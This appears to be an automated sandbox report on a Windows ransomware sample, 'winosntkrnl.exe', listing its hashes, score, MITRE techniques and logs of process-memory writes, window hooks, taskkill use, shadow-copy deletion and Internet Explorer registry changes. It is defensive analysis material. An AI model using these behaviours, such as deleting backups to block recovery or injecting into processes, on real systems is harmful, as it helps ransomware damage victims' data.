2a0ce8239387c614b1728bd9ec954e1e9ab985dde87e5976519ee1cfca1ee896

Analysis

max time kernel
59s
max time network
56s
platform
windows7_x64
resource
win7v200430
submitted
12-07-2020 04:08

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

winosntkrnl.exe
Size

2.1MB
MD5

23959126c21fdda02365352cd3e03d28
SHA1

05a025b6ad3f4b88084624234312767e9402202a
SHA256

2a0ce8239387c614b1728bd9ec954e1e9ab985dde87e5976519ee1cfca1ee896
SHA512

ad5326da158a3701aeb827084a425ab7e2633ca59837241da449b03d4be7b8f77c336748dc1cf0f7d4fd4928f6258c83c7fbda9a5b28686f36e0666f07c42084

Score

9^/10

bootkit persistence discovery ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Suspicious use of WriteProcessMemory 152 IoCs

description	pid	Process	procid_target
PID 240 wrote to memory of 1860	240	winosntkrnl.exe	26
PID 240 wrote to memory of 1860	240	winosntkrnl.exe	26
PID 240 wrote to memory of 1860	240	winosntkrnl.exe	26
PID 240 wrote to memory of 1860	240	winosntkrnl.exe	26
PID 240 wrote to memory of 1872	240	winosntkrnl.exe	27
PID 240 wrote to memory of 1872	240	winosntkrnl.exe	27
PID 240 wrote to memory of 1872	240	winosntkrnl.exe	27
PID 240 wrote to memory of 1872	240	winosntkrnl.exe	27
PID 1872 wrote to memory of 1768	1872	cmd.exe	28
PID 1872 wrote to memory of 1768	1872	cmd.exe	28
PID 1872 wrote to memory of 1768	1872	cmd.exe	28
PID 1872 wrote to memory of 1768	1872	cmd.exe	28
PID 240 wrote to memory of 1752	240	winosntkrnl.exe	29
PID 240 wrote to memory of 1752	240	winosntkrnl.exe	29
PID 240 wrote to memory of 1752	240	winosntkrnl.exe	29
PID 240 wrote to memory of 1752	240	winosntkrnl.exe	29
PID 1752 wrote to memory of 1776	1752	cmd.exe	30
PID 1752 wrote to memory of 1776	1752	cmd.exe	30
PID 1752 wrote to memory of 1776	1752	cmd.exe	30
PID 1752 wrote to memory of 1776	1752	cmd.exe	30
PID 240 wrote to memory of 568	240	winosntkrnl.exe	32
PID 240 wrote to memory of 568	240	winosntkrnl.exe	32
PID 240 wrote to memory of 568	240	winosntkrnl.exe	32
PID 240 wrote to memory of 568	240	winosntkrnl.exe	32
PID 568 wrote to memory of 360	568	cmd.exe	33
PID 568 wrote to memory of 360	568	cmd.exe	33
PID 568 wrote to memory of 360	568	cmd.exe	33
PID 568 wrote to memory of 360	568	cmd.exe	33
PID 240 wrote to memory of 804	240	winosntkrnl.exe	34
PID 240 wrote to memory of 804	240	winosntkrnl.exe	34
PID 240 wrote to memory of 804	240	winosntkrnl.exe	34
PID 240 wrote to memory of 804	240	winosntkrnl.exe	34
PID 804 wrote to memory of 1624	804	cmd.exe	35
PID 804 wrote to memory of 1624	804	cmd.exe	35
PID 804 wrote to memory of 1624	804	cmd.exe	35
PID 804 wrote to memory of 1624	804	cmd.exe	35
PID 240 wrote to memory of 1636	240	winosntkrnl.exe	36
PID 240 wrote to memory of 1636	240	winosntkrnl.exe	36
PID 240 wrote to memory of 1636	240	winosntkrnl.exe	36
PID 240 wrote to memory of 1636	240	winosntkrnl.exe	36
PID 1636 wrote to memory of 1496	1636	cmd.exe	38
PID 1636 wrote to memory of 1496	1636	cmd.exe	38
PID 1636 wrote to memory of 1496	1636	cmd.exe	38
PID 1636 wrote to memory of 1496	1636	cmd.exe	38
PID 240 wrote to memory of 1988	240	winosntkrnl.exe	39
PID 240 wrote to memory of 1988	240	winosntkrnl.exe	39
PID 240 wrote to memory of 1988	240	winosntkrnl.exe	39
PID 240 wrote to memory of 1988	240	winosntkrnl.exe	39
PID 240 wrote to memory of 1964	240	winosntkrnl.exe	40
PID 240 wrote to memory of 1964	240	winosntkrnl.exe	40
PID 240 wrote to memory of 1964	240	winosntkrnl.exe	40
PID 240 wrote to memory of 1964	240	winosntkrnl.exe	40
PID 240 wrote to memory of 1944	240	winosntkrnl.exe	41
PID 240 wrote to memory of 1944	240	winosntkrnl.exe	41
PID 240 wrote to memory of 1944	240	winosntkrnl.exe	41
PID 240 wrote to memory of 1944	240	winosntkrnl.exe	41
PID 240 wrote to memory of 1984	240	winosntkrnl.exe	42
PID 240 wrote to memory of 1984	240	winosntkrnl.exe	42
PID 240 wrote to memory of 1984	240	winosntkrnl.exe	42
PID 240 wrote to memory of 1984	240	winosntkrnl.exe	42
PID 240 wrote to memory of 1008	240	winosntkrnl.exe	43
PID 240 wrote to memory of 1008	240	winosntkrnl.exe	43
PID 240 wrote to memory of 1008	240	winosntkrnl.exe	43
PID 240 wrote to memory of 1008	240	winosntkrnl.exe	43
PID 1008 wrote to memory of 2016	1008	cmd.exe	44
PID 1008 wrote to memory of 2016	1008	cmd.exe	44
PID 1008 wrote to memory of 2016	1008	cmd.exe	44
PID 1008 wrote to memory of 2016	1008	cmd.exe	44
PID 240 wrote to memory of 1996	240	winosntkrnl.exe	45
PID 240 wrote to memory of 1996	240	winosntkrnl.exe	45
PID 240 wrote to memory of 1996	240	winosntkrnl.exe	45
PID 240 wrote to memory of 1996	240	winosntkrnl.exe	45
PID 1996 wrote to memory of 2000	1996	cmd.exe	46
PID 1996 wrote to memory of 2000	1996	cmd.exe	46
PID 1996 wrote to memory of 2000	1996	cmd.exe	46
PID 1996 wrote to memory of 2000	1996	cmd.exe	46
PID 240 wrote to memory of 2044	240	winosntkrnl.exe	47
PID 240 wrote to memory of 2044	240	winosntkrnl.exe	47
PID 240 wrote to memory of 2044	240	winosntkrnl.exe	47
PID 240 wrote to memory of 2044	240	winosntkrnl.exe	47
PID 240 wrote to memory of 1468	240	winosntkrnl.exe	48
PID 240 wrote to memory of 1468	240	winosntkrnl.exe	48
PID 240 wrote to memory of 1468	240	winosntkrnl.exe	48
PID 240 wrote to memory of 1468	240	winosntkrnl.exe	48
PID 240 wrote to memory of 1504	240	winosntkrnl.exe	49
PID 240 wrote to memory of 1504	240	winosntkrnl.exe	49
PID 240 wrote to memory of 1504	240	winosntkrnl.exe	49
PID 240 wrote to memory of 1504	240	winosntkrnl.exe	49
PID 240 wrote to memory of 996	240	winosntkrnl.exe	50
PID 240 wrote to memory of 996	240	winosntkrnl.exe	50
PID 240 wrote to memory of 996	240	winosntkrnl.exe	50
PID 240 wrote to memory of 996	240	winosntkrnl.exe	50
PID 996 wrote to memory of 1532	996	iexplore.exe	51
PID 996 wrote to memory of 1532	996	iexplore.exe	51
PID 996 wrote to memory of 1532	996	iexplore.exe	51
PID 996 wrote to memory of 1532	996	iexplore.exe	51
PID 240 wrote to memory of 1804	240	winosntkrnl.exe	52
PID 240 wrote to memory of 1804	240	winosntkrnl.exe	52
PID 240 wrote to memory of 1804	240	winosntkrnl.exe	52
PID 240 wrote to memory of 1804	240	winosntkrnl.exe	52
PID 1804 wrote to memory of 1836	1804	iexplore.exe	53
PID 1804 wrote to memory of 1836	1804	iexplore.exe	53
PID 1804 wrote to memory of 1836	1804	iexplore.exe	53
PID 1804 wrote to memory of 1836	1804	iexplore.exe	53
PID 240 wrote to memory of 1876	240	winosntkrnl.exe	54
PID 240 wrote to memory of 1876	240	winosntkrnl.exe	54
PID 240 wrote to memory of 1876	240	winosntkrnl.exe	54
PID 240 wrote to memory of 1876	240	winosntkrnl.exe	54
PID 1876 wrote to memory of 1664	1876	iexplore.exe	55
PID 1876 wrote to memory of 1664	1876	iexplore.exe	55
PID 1876 wrote to memory of 1664	1876	iexplore.exe	55
PID 1876 wrote to memory of 1664	1876	iexplore.exe	55
PID 240 wrote to memory of 1744	240	winosntkrnl.exe	56
PID 240 wrote to memory of 1744	240	winosntkrnl.exe	56
PID 240 wrote to memory of 1744	240	winosntkrnl.exe	56
PID 240 wrote to memory of 1744	240	winosntkrnl.exe	56
PID 1744 wrote to memory of 1428	1744	iexplore.exe	57
PID 1744 wrote to memory of 1428	1744	iexplore.exe	57
PID 1744 wrote to memory of 1428	1744	iexplore.exe	57
PID 1744 wrote to memory of 1428	1744	iexplore.exe	57
PID 240 wrote to memory of 1668	240	winosntkrnl.exe	58
PID 240 wrote to memory of 1668	240	winosntkrnl.exe	58
PID 240 wrote to memory of 1668	240	winosntkrnl.exe	58
PID 240 wrote to memory of 1668	240	winosntkrnl.exe	58
PID 1668 wrote to memory of 1756	1668	iexplore.exe	59
PID 1668 wrote to memory of 1756	1668	iexplore.exe	59
PID 1668 wrote to memory of 1756	1668	iexplore.exe	59
PID 1668 wrote to memory of 1756	1668	iexplore.exe	59
PID 240 wrote to memory of 360	240	winosntkrnl.exe	60
PID 240 wrote to memory of 360	240	winosntkrnl.exe	60
PID 240 wrote to memory of 360	240	winosntkrnl.exe	60
PID 240 wrote to memory of 360	240	winosntkrnl.exe	60
PID 360 wrote to memory of 500	360	iexplore.exe	61
PID 360 wrote to memory of 500	360	iexplore.exe	61
PID 360 wrote to memory of 500	360	iexplore.exe	61
PID 360 wrote to memory of 500	360	iexplore.exe	61
PID 240 wrote to memory of 1920	240	winosntkrnl.exe	62
PID 240 wrote to memory of 1920	240	winosntkrnl.exe	62
PID 240 wrote to memory of 1920	240	winosntkrnl.exe	62
PID 240 wrote to memory of 1920	240	winosntkrnl.exe	62
PID 1920 wrote to memory of 1608	1920	iexplore.exe	63
PID 1920 wrote to memory of 1608	1920	iexplore.exe	63
PID 1920 wrote to memory of 1608	1920	iexplore.exe	63
PID 1920 wrote to memory of 1608	1920	iexplore.exe	63
PID 240 wrote to memory of 1972	240	winosntkrnl.exe	64
PID 240 wrote to memory of 1972	240	winosntkrnl.exe	64
PID 240 wrote to memory of 1972	240	winosntkrnl.exe	64
PID 240 wrote to memory of 1972	240	winosntkrnl.exe	64
PID 1972 wrote to memory of 2016	1972	iexplore.exe	65
PID 1972 wrote to memory of 2016	1972	iexplore.exe	65
PID 1972 wrote to memory of 2016	1972	iexplore.exe	65
PID 1972 wrote to memory of 2016	1972	iexplore.exe	65

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
996	iexplore.exe
996	iexplore.exe
1804	iexplore.exe
1804	iexplore.exe
1876	iexplore.exe
1876	iexplore.exe
1744	iexplore.exe
1744	iexplore.exe
1668	iexplore.exe
1668	iexplore.exe
360	iexplore.exe
360	iexplore.exe
1920	iexplore.exe
1920	iexplore.exe
1972	iexplore.exe
1972	iexplore.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1776	taskkill.exe
360	taskkill.exe
1624	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 128 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{12DD4B91-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2341E3B1-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{279BE731-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1C7A9951-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2516D291-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{215C4B31-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1EB5E351-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
